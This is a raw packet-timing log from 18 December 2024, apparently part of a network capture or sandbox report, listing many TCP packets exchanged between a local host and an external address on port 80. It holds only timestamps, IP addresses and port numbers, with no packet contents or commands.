                                                                                                                                                                                          Dec 18, 2024 09:07:32.146266937 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:32.146310091 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:32.146374941 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:32.146428108 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:32.147363901 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:32.147375107 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:32.147413969 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:32.148288965 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:32.148335934 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:32.148435116 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:32.148477077 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:32.149342060 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:32.149394989 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:32.149399042 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:32.149435997 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:32.150310040 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:32.150377035 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:32.150412083 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:32.150453091 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:32.151324987 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:32.151376963 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:32.151415110 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:32.151458979 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:32.152354002 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:32.152403116 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:32.152437925 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:32.152477980 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:32.153333902 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:32.153378963 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:32.153453112 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:32.153489113 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:32.154426098 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:32.154468060 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:32.154485941 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:32.154521942 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:32.155375957 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:32.155443907 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:32.155510902 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:32.155555964 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:32.156434059 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:32.156480074 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:32.156568050 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:32.156619072 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:32.157510042 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:32.157521009 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:32.157565117 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:32.158447027 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:32.158485889 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:32.158579111 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:32.158622026 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:32.159477949 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:32.159533978 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:32.159557104 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:32.159595013 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:32.160615921 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:32.160626888 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:32.160655975 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:32.160682917 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:32.161441088 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:32.161485910 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:32.161552906 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:32.161604881 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:32.162491083 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:32.162544966 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:32.162734032 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:32.162790060 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:32.163480043 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:32.163619995 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:32.163660049 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:32.164565086 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:32.164613008 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:32.164680958 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:32.164731026 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:32.165592909 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:32.165637016 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:32.165751934 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:32.165791988 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:32.166548967 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:32.166604042 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:32.166673899 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:32.166718960 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:32.167527914 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:32.167587996 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:32.167665005 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:32.167810917 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:32.168690920 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:32.168700933 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:32.168751001 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:32.169635057 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:32.169687986 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:32.170314074 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:32.170358896 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:32.170550108 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:32.170604944 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:32.170959949 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:32.171004057 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:32.171720982 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:32.171766043 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:32.171785116 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:32.171802998 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:32.172600031 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:32.172674894 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:32.172830105 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:32.172882080 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:32.173593998 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:32.173630953 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:32.173790932 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:32.173835993 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:32.174637079 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:32.174690008 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:32.174757957 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:32.174809933 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:32.175638914 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:32.175695896 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:32.175705910 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:32.175740957 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:32.176810980 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:32.176821947 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:32.176860094 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:32.177740097 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:32.177751064 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:32.177797079 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:32.179028988 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:32.179039955 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:32.179095984 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:32.179119110 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:32.318002939 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:32.318053961 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:32.318084002 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:32.318125010 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:32.318205118 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:32.318254948 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:32.318358898 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:32.318407059 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:32.318521023 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:32.318633080 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:32.319426060 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:32.319480896 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:32.319751978 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:32.320029974 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:32.320457935 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:32.320503950 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:32.320576906 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:32.320763111 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:32.321455002 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:32.321500063 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:32.321603060 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:32.321644068 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:32.322500944 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:32.322573900 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:32.322602034 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:32.322616100 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:32.323431969 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:32.323473930 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:32.323559999 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:32.323618889 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:32.324424028 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:32.324486971 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:32.324533939 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:32.324767113 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:32.325531006 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:32.325553894 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:32.325584888 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:32.325603962 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:32.326478004 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:32.326523066 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:32.326611042 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:32.326653004 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:32.327469110 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:32.327517033 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:32.327550888 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:32.327594042 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:32.328588009 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:32.328617096 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:32.328656912 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:32.329575062 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:32.329621077 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:32.329710960 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:32.330089092 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:32.330712080 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:32.330724955 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:32.330769062 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:32.331556082 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:32.331615925 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:32.331686020 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:32.331723928 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:32.332532883 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:32.332585096 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:32.332757950 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:32.332813978 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:32.333527088 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:32.333662987 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:32.333664894 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:32.333997965 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:32.334615946 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:32.334681988 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:32.334765911 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:32.334804058 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:32.335635900 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:32.335763931 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:32.335829973 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:32.335871935 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:32.336708069 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:32.336723089 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:32.336776972 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:32.337670088 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:32.337687016 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:32.337713957 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:32.337729931 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:32.338610888 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:32.338654995 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:32.338680029 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:32.338726044 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:32.339637995 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:32.339683056 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:32.339827061 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:32.339865923 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:32.340651035 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:32.340689898 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:32.340743065 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:32.340785980 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:32.341608047 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:32.341658115 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:32.341768026 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:32.341804981 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:32.342704058 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:32.342746973 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:32.342757940 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:32.342806101 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:32.343775988 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:32.343796015 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:32.343837023 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:32.344755888 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:32.344769955 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:32.344805956 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:32.344825029 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:32.345827103 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:32.345838070 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:32.345884085 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:32.347398043 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:32.347415924 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:32.347450972 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:32.347474098 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:32.347975016 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:32.347985983 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:32.348022938 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:32.349040031 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:32.349052906 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:32.349104881 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:32.352273941 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:32.352381945 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:32.353311062 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:32.353347063 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:32.353368044 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:32.353384972 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:32.353501081 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:32.353512049 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:32.353533030 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:32.353559971 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:32.353581905 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:32.354010105 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:32.354022980 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:32.354075909 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:32.355204105 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:32.355221987 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:32.355268002 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:32.355283022 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:32.356141090 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:32.356215000 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:32.356311083 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:32.356359005 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:32.357250929 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:32.357261896 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:32.357312918 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:32.358124971 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:32.358175993 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:32.358282089 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:32.358369112 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:32.359108925 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:32.359164953 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:32.359270096 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:32.359489918 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:32.360126019 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:32.360138893 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:32.360183001 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:32.361087084 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:32.361140966 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:32.361259937 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:32.361346960 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:32.362176895 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:32.362205982 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:32.362243891 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:32.363126040 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:32.363178015 CET4972080192.168.2.831.41.244.11
